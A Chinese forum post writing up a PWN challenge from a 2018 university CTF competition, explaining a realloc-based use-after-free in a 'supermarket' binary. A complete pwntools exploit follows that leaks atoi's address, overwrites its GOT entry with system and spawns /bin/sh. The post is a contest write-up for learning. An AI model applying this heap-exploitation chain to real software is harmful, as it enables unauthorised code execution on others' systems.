首页
论坛
课程
招聘
[原创]2018全国大学生信息安全竞赛----PWN签到题
2018-4-29 18:28 3334

[原创]2018全国大学生信息安全竞赛----PWN签到题

2018-4-29 18:28
3334

全国大学生信息安全竞赛-PWN

序言

第一次在大赛中做出PWN题, 心情有点小激动.

程序运行

0. 结构体

struct node{
    char name[16];
    int price;
    int size;
    char* des;
}commodity[15];

1.MENU

1. add a commodity
2. del a commodity
3. list commodities
4. Change the price of a commodity
5. Change the description of a commodity
6. exit

2. Add

add 一个 commodity, 输入name, price, descrip_size

 

3. Del

del一个commodity, 数组的指针会清零, des释放, price清零

 

4. list

列出所有内容,

 

5. Change the price(没什么用)
6. Change the description of a commodity

    漏洞在realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原原指针, 重新分配内存. 但数组中的s指针并没有改成新分配的堆指针, 仍指向已释放的, 这点很重要. 此时又分配一个node, 恰好是这个已释放的堆, 那么上一个堆就可以编辑这个新分配的堆, 恐怖.

char *realloc(ptr, newSize)
    char      *ptr;        /* Ptr to currently allocated block.  If
                 * it's 0, then this procedure behaves
                 * identically to malloc. */
    unsigned int newSize;    /* Size of block after it is extended */
{
    unsigned int curSize;
    char *newPtr;

    if (ptr == 0) {
       return malloc(newSize);
    }
    curSize = Mem_Size(ptr);
    if (newSize <= curSize) {
       return ptr;
    }
    newPtr = malloc(newSize);
    bcopy(ptr, newPtr, (int) curSize);
    free(ptr);
    return(newPtr);
}

过程

    思路: 利用realloc函数产生的释放原指针, 程序没有更新指针. 实现修改leak memory求得system真实地址,修改atoi的got表值为system, 发送/bin/sh\x00.

 

步骤一

new("bill", 100, 0x80, "A"*0x80) # target
new("john", 200, 0x18, "A"*0x18) #
change_des("bill", 0xb0, "")     # 下面结果可以看见bill的原指针已被释放
'''
chunk      0x9dde000        0x20            (inuse)
chunk      0x9dde020        0x88            (F) FD 0xf76e5700 BK 0xf76e57b0
chunk      0x9dde0a8        0x20            (inuse)
chunk      0x9dde0c8        0x20            (inuse)
chunk      0x9dde0e8        0xb8            (inuse)
'''
new("merry", 200, 0x50, "A"*0x7) # merry被分配到此处, bill可以编辑merry的s

步骤二: leak memory

payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59) # 泄露atoi的函数地址, 这也是为了确定远程的libc.so的版本, 然后使用libc-database找出其版本
change_des("bill", 0x80, payload)
list_all()

步骤三: modify

change_des("merry", 0x50, p32(system)) #修改merry, 输入system, 相当于修改atoi的got值为system地址

步骤四: get shell

p.sendline("/bin/sh\x00")

The Whole EXP

from pwn import *

p = process("./task_supermarket")
#p = remote("117.78.43.123", 31420)
elf = ELF("./task_supermarket")
#libc = ELF("./libc.so.6")
libc = ELF("./libc.so") #本机的libc
context.log_level = 'debug'

def new(name, price, size, des):
    p.recvuntil("your choice>> ")
    p.sendline("1")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("price:")
    p.sendline(str(price))
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(des)

def delete(name):
    p.recvuntil("your choice>> ")
    p.send("2\n")
    p.recvuntil("name:")
    p.sendline(name)

def list_all():
    p.recvuntil("your choice>> ")
    p.send("3\n")

def change_price(name, price):
    p.recvuntil("your choice>> ")
    p.sendline("4")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("or rise in:")
    p.sendline(str(price))

def change_des(name, size, des):
    p.recvuntil("your choice>> ")
    p.sendline("5")
    p.recvuntil("name:")
    p.sendline(name)
    p.recvuntil("descrip_size:")
    p.sendline(str(size))
    p.recvuntil("description:")
    p.sendline(des)

free_got = elf.got['free']
atoi = elf.got['atoi']
puts = elf.plt['puts']

gdb.attach(p)
new("bill", 100, 0x80, "A"*0x80)
new("john", 200, 0x18, "A"*0x18)
change_des("bill", 0xb0, "")
new("merry", 200, 0x50, "A"*0x7)

payload = "merry\x00" + "A"*(0x1c-6-4-4) + p32(0x50) + p32(atoi) + p16(0x59)
change_des("bill", 0x80, payload)
list_all()
p.recvuntil("merry: price.")
p.recv(16)
real_atoi = u32(p.recv(4))
system = real_atoi - (libc.symbols['atoi'] - libc.symbols['system'])

log.info("real_atoi: %s" % hex(real_atoi))
log.info("system: %s" % hex(system))
change_des("merry", 0x50, p32(system))

p.recvuntil("your choice>> ")
p.sendline("/bin/sh\x00")
p.interactive()

Related Link

相关文件


[公告]《安卓APP加固攻与防》训练营!Android逆向分析技能,干货满满,报名免费赠送一部手机!

最后于 2018-4-30 18:41 被baolongshou编辑 ,原因:
收藏
点赞1
打赏
分享
最新回复 (1)
雪    币: 2694
活跃值: 活跃值 (58)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
BlackJZero 活跃值 2018-4-30 00:25
2
0
学习
游客
登录 | 注册 方可回帖
返回